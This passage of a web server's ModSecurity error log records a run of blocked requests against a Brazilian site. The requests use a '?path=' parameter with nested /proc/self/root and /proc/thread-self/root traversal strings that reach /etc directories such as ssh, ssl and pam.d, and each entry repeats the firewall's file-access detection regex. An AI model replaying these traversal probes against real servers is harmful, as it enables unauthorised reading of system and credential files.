"/"] [unique_id "ab0Sy_XLqtnMIWvjpaKHqAAAApY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 06:26:36.076910 2026] [:error] [pid 11167:tid 140411699963648] [client 74.7.243.128:53650] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0SzPHIg5MgXLBnicPm_gAAAcU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:26:37.455565 2026] [:error] [pid 10189:tid 140411624429312] [client 74.7.243.128:53652] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0SzTJ3M9BSuKP7CAYEzAAAAI4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:26:37.669131 2026] [:error] [pid 11642:tid 140411557287680] [client 74.7.241.31:34720] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0Szbninkcc-iUj5ApMAwAAA5Y"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 06:26:38.995104 2026] [:error] [pid 11167:tid 140411649607424] [client 74.7.241.31:53064] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0SzvHIg5MgXLBnicPnAAAAAcs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 06:26:39.675247 2026] [:error] [pid 26799:tid 140411666392832] [client 74.7.243.128:53668] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0Sz9a6ubjKNq_cu4bADgAAA0k"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:26:40.209054 2026] [:error] [pid 26799:tid 140411691570944] [client 74.7.241.31:53066] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0S0Na6ubjKNq_cu4bAEAAAA0Y"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 06:26:40.950921 2026] [:error] [pid 7893:tid 140411716749056] [client 74.7.243.128:39108] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0S0BCii7xarUs8iHZV0gAAAgM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:26:41.510878 2026] [:error] [pid 11167:tid 140411708356352] [client 74.7.241.31:53082] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0S0fHIg5MgXLBnicPnAQAAAcQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 06:26:42.263719 2026] [:error] [pid 7893:tid 140411548894976] [client 74.7.243.128:39110] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0S0hCii7xarUs8iHZV1AAAAhc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:26:42.843184 2026] [:error] [pid 31215:tid 140411565680384] [client 74.7.241.31:53086] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0S0gF0L0L-SsrnPo5VHwAAAtU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 06:26:43.543483 2026] [:error] [pid 15826:tid 140411632822016] [client 74.7.243.128:39112] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0S0-oXxyEfFpUF8f9vkAAAAU0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:26:45.723267 2026] [:error] [pid 10189:tid 140411741927168] [client 74.7.241.31:53096] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0S1TJ3M9BSuKP7CAYEzgAAAIA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 06:26:45.730728 2026] [:error] [pid 15826:tid 140411741927168] [client 74.7.243.128:39128] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0S1OoXxyEfFpUF8f9vlgAAAUA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:26:48.137191 2026] [:error] [pid 15826:tid 140411624429312] [client 74.7.241.31:53110] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0S1-oXxyEfFpUF8f9vmwAAAU4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 06:26:51.923171 2026] [:error] [pid 10189:tid 140411716749056] [client 74.7.241.31:42412] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0S2zJ3M9BSuKP7CAYE1QAAAIM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 06:26:52.502497 2026] [:error] [pid 7235:tid 140411716749056] [client 74.7.243.128:39140] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0S3PqxLDW4GITHUkTSoAAAAQM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:26:53.233652 2026] [:error] [pid 9818:tid 140411641214720] [client 74.7.241.31:42418] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0S3V1pVZ5mVmJwsFMdZwAAAEw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 06:26:53.859334 2026] [:error] [pid 31215:tid 140411733534464] [client 74.7.243.128:36182] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0S3QF0L0L-SsrnPo5VJAAAAsE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:26:54.447295 2026] [:error] [pid 11642:tid 140411540502272] [client 74.7.241.31:42422] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0S3rninkcc-iUj5ApMBgAAA5g"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 06:26:55.063252 2026] [:error] [pid 7235:tid 140411616036608] [client 74.7.243.128:36192] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0S3_qxLDW4GITHUkTSogAAAQ8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:26:56.506697 2026] [:error] [pid 10189:tid 140411599251200] [client 74.7.243.128:36204] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0S4DJ3M9BSuKP7CAYE2QAAAJE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
